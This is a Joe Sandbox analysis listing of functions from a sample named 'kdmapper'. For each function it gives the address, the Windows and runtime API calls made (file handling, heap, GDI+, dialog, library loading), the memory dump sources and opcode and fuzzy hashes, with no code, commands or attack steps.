Function 00621E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00621E55

Part of subcall function 00623BBA: __EH_prolog.LIBCMT ref: 00623BBF

_wcslen.LIBCMT ref: 00621EFD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: c1b4e7ce4990a47fb48e2d24b38602ed6b643eda3cacffc7e854df4126a9f016
Instruction ID: 28dec223d924136d4af93c8e86d0597d9033d3f4de9d0bf7949c77dbd5549a3e
Opcode Fuzzy Hash: c1b4e7ce4990a47fb48e2d24b38602ed6b643eda3cacffc7e854df4126a9f016
Instruction Fuzzy Hash: 8B316B719086199FCF51EF98E945AEEFBF6AF19300F20006EE885AB251C7365E01CF64

Function 00629DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,006273BC,?,?,?,00000000), ref: 00629DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00629E70

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 22b228b3a9040fa1ac5927d5a7e879767bed727eb234e16b8ff9b2cd7f3155ce
Instruction ID: 4462a1e3789f5934f2df3f6cb439534333c0c6f3e27f611e5f06ccb719ae8b29
Opcode Fuzzy Hash: 22b228b3a9040fa1ac5927d5a7e879767bed727eb234e16b8ff9b2cd7f3155ce
Instruction Fuzzy Hash: 3121F231248B659BC714CF34D891AABBBE5AF91704F08481CF4C5C7281D329D90C9FB1

Function 0062966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00629F27,?,?,0062771A), ref: 006296E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00629F27,?,?,0062771A), ref: 00629716

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6870ae06a4495f7a1ccb474717b498eb97f5cc83c00a9e8322c6c67b59406386
Instruction ID: b44f3c78f2ee97959b8481643cae92833d8c72a0e8cd9007c6c9e7b6b76e12b5
Opcode Fuzzy Hash: 6870ae06a4495f7a1ccb474717b498eb97f5cc83c00a9e8322c6c67b59406386
Instruction Fuzzy Hash: D421FF71004B54AFF3708A65DC89FE7B3DEEB89320F104A18FAD6C62C1C774A8848A71

Function 00629E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00629EC7
GetLastError.KERNEL32 ref: 00629ED4

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: d91d1d983d03a9117b9616727c6cb9e8e535065d5469e1a0fa345175f76b8f3d
Instruction ID: 8181046b9aeec770d94cb04b35c8cacd317c1dac8373beef97153088d5bfac38
Opcode Fuzzy Hash: d91d1d983d03a9117b9616727c6cb9e8e535065d5469e1a0fa345175f76b8f3d
Instruction Fuzzy Hash: E311E530600B24ABD724DA28E841BE6B7EBAF85370F514A29E592D27D0D770ED45CB70

Function 00648E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00648E75

Part of subcall function 00648E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0064CA2C,00000000,?,00646CBE,?,00000008,?,006491E0,?,?,?), ref: 00648E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00661098,006217CE,?,?,00000007,?,?,?,006213D6,?,00000000), ref: 00648EB1

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 5e6a115fefae6089b901fcfd9d0ae3dadb52bbdbb921a24634ab71840045ac63
Instruction ID: 0c95e4a9569acf624a863b2abcd9c4abde844892995ce282e2bd8710a935d180
Opcode Fuzzy Hash: 5e6a115fefae6089b901fcfd9d0ae3dadb52bbdbb921a24634ab71840045ac63
Instruction Fuzzy Hash: 87F0BB32601216BEDB217B65AC05FEF375B8FC2B70F24412AF914A7292DF70DD0181A4

Function 0063109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 006310AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 006310B2

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 991411d5c40c3dd276c709d17d162baa451df4da7d4c9a380b4a9e0b6e8e0575
Instruction ID: cc826b847108e71bd12011bbfb47877a2e01ca206b465fb148442f84e1f53f69
Opcode Fuzzy Hash: 991411d5c40c3dd276c709d17d162baa451df4da7d4c9a380b4a9e0b6e8e0575
Instruction Fuzzy Hash: 43E09A32F00259A78F0D8BA49C058EBB2EFEA45245B209179E403EB201FE30EE414AA0

Function 0062A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0062A325,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A501

Part of subcall function 0062BB03: _wcslen.LIBCMT ref: 0062BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0062A325,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A532

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 9dd2cb560941b5dc5a4334e1bfd8c87e2b64c1dccc3aced44b8e924186cb056f
Instruction ID: ba48fa62c09c88c06601aadd4e85d6decd8e5e94afde5450abfc20ec1bf526c4
Opcode Fuzzy Hash: 9dd2cb560941b5dc5a4334e1bfd8c87e2b64c1dccc3aced44b8e924186cb056f
Instruction Fuzzy Hash: 47F030312403297BDF025F60EC45FDA376EAB04786F448455B945E52A0DB71DA94DF50

Function 0062A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,0062977F,?,?,006295CF,?,?,?,?,?,00652641,000000FF), ref: 0062A1F1

Part of subcall function 0062BB03: _wcslen.LIBCMT ref: 0062BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0062977F,?,?,006295CF,?,?,?,?,?,00652641), ref: 0062A21F

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: eeae2a7a772541ec79c0b1ac921407d5c28a15c48fac39f909ec671a22fcfb42
Instruction ID: 3bf0efed786a74624ac1fa0324c1c4155facae688eea74af61b74db12d326111
Opcode Fuzzy Hash: eeae2a7a772541ec79c0b1ac921407d5c28a15c48fac39f909ec671a22fcfb42
Instruction Fuzzy Hash: 8BE09231150329ABEB019F60EC45FD9375EAB087C2F484025B944D2190EB61DE84DE64

Function 0063AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00652641,000000FF), ref: 0063ACB0
CoUninitialize.COMBASE(?,?,?,?,00652641,000000FF), ref: 0063ACB5

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 01dcc6965517dd99709a2f8cfb3589a38bbe9215bee2432d95289bc8c744bde3
Instruction ID: 750d7a1c5f50e0a9c6d06a16d2bfc5021b769ca40b2d7317ff09a42b2be13ab2
Opcode Fuzzy Hash: 01dcc6965517dd99709a2f8cfb3589a38bbe9215bee2432d95289bc8c744bde3
Instruction Fuzzy Hash: BAE06D72644A50EFCB01DB59DC46B49FBAAFB88F20F00436AF456D37A0CB74AD00CA94

Function 0062A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0062A23A,?,0062755C,?,?,?,?), ref: 0062A254

Part of subcall function 0062BB03: _wcslen.LIBCMT ref: 0062BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0062A23A,?,0062755C,?,?,?,?), ref: 0062A280

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: f2e89ff72063374f67a8ad4eaaac4a700f747f13d3f5e118d00d8f7f781aea4c
Instruction ID: 40af68ea0b2b31c10a9391e4163da8a81ca38aaf99b638feec72a57804cf3b80
Opcode Fuzzy Hash: f2e89ff72063374f67a8ad4eaaac4a700f747f13d3f5e118d00d8f7f781aea4c
Instruction Fuzzy Hash: D9E092315012349BCB50EB64DC05BD9775AAB087E2F044261FD54E32D0D771DE44CBE0

Function 0063DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0063DEEC

Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5

SetDlgItemTextW.USER32(00000065,?), ref: 0063DF03

Part of subcall function 0063B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0063B579
Part of subcall function 0063B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0063B58A
Part of subcall function 0063B568: IsDialogMessageW.USER32(000303EC,?), ref: 0063B59E
Part of subcall function 0063B568: TranslateMessage.USER32(?), ref: 0063B5AC
Part of subcall function 0063B568: DispatchMessageW.USER32(?), ref: 0063B5B6

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 52845177d649105ec867d46c4ccb2bbf011758354e47c452f65f69db069f4b21
Instruction ID: 4281c699f05a3827c89fb926f77612e6f7fcd0cb4cf09cd26116ea1c4a62624e
Opcode Fuzzy Hash: 52845177d649105ec867d46c4ccb2bbf011758354e47c452f65f69db069f4b21
Instruction Fuzzy Hash: CFE092B24003582ADF12AB71DC0AF9E3BAE5B05B85F041955F240DB1E2DE79EA508B65

Function 0063081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00630836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0062F2D8,Crypt32.dll,00000000,0062F35C,?,?,0062F33E,?,?,?), ref: 00630858

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: a30263be07dd0182ac72132cb786d4412d75090a83aaff735c48f2c38a886e1c
Instruction ID: 15dce5c41d4d5eff97b1c4e6c559f1e6f6ca084416fe36f071d6b37ac8a1bd84
Opcode Fuzzy Hash: a30263be07dd0182ac72132cb786d4412d75090a83aaff735c48f2c38a886e1c
Instruction Fuzzy Hash: 33E0D8764002286BDF01A790DC04FDA77ADEF087C2F040065B605D2144D674DA84CBF4

Function 0063A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0063A3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0063A3E1

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 2a5be5bc43930a739b7b0aeba78ad97e45522557cb1b2a5574e0cb556d07dbd5
Instruction ID: 1dfad1e546de0ad8cc2d906a9fcd75f65b0c9f2e89f791d58c9030ad1b63dd62
Opcode Fuzzy Hash: 2a5be5bc43930a739b7b0aeba78ad97e45522557cb1b2a5574e0cb556d07dbd5
Instruction Fuzzy Hash: 9AE0ED72500218EBDB50DF95C541B99BBE9EB04365F10805AE886D3241E774AE44DBA1

Function 00642B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00642BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00642BB5

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 76e4d8f180c43a54eb4b27c9ac818fc879830851c10b870afa84f3a747fb6a52
Instruction ID: 274a1d58387e15e5eb5df5588d029e9a29953eff2f2a6d9b1054c386d84e3e12
Opcode Fuzzy Hash: 76e4d8f180c43a54eb4b27c9ac818fc879830851c10b870afa84f3a747fb6a52
Instruction Fuzzy Hash: 45D022385A4323188F987E7039B34883B87ED42B7DBF0139EF83086FC1EE118080A219

Function 006212F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00621306
ShowWindow.USER32(00000000), ref: 0062130D

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 8055bc9b8cbfa8620604d80c2b8ae3a99bf6eaa912019cad432e17c767fb8d97
Instruction ID: 0d2f1a8718de849344a7558f560cc099225e26b34e0631095c088744ede04d76
Opcode Fuzzy Hash: 8055bc9b8cbfa8620604d80c2b8ae3a99bf6eaa912019cad432e17c767fb8d97
Instruction Fuzzy Hash: 0CC0123205C220BECB010BB4DC0DC2BBBAAABA5B12F04CA08B2E5C0260E238C110DB11

Function 00621A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00621A09

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: fbb29a5840caecd6ad3ff7e07bfe3c3c5b5c45762de1e103520e214379a59066
Instruction ID: b57dc1951b3a9b1084c3c793c7ab09badd1c7403f589fbc2eae2c020a45a0e25
Opcode Fuzzy Hash: fbb29a5840caecd6ad3ff7e07bfe3c3c5b5c45762de1e103520e214379a59066
Instruction Fuzzy Hash: 73C1C530A08A649FEF15CF68D494BE97BA7AF26310F1805B9DC459F382DB309945CF61

Function 00623BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00623BBF

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 05be9903a383f642b1399e7f4471353b596912212b227318e5d5d7e99821c97f
Instruction ID: d14c7e25e11ac3af2985a1fba2692c67c9e49fbb0c0ce9f7ceb574a33be0cece
Opcode Fuzzy Hash: 05be9903a383f642b1399e7f4471353b596912212b227318e5d5d7e99821c97f
Instruction Fuzzy Hash: B071BD71500FA49EDB25DB70D8519E7B7EAAF15301F41092EE2AB87342DB366A88CF11

Function 00628284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00628289

Part of subcall function 006213DC: __EH_prolog.LIBCMT ref: 006213E1

Part of subcall function 0062A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0062A598

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
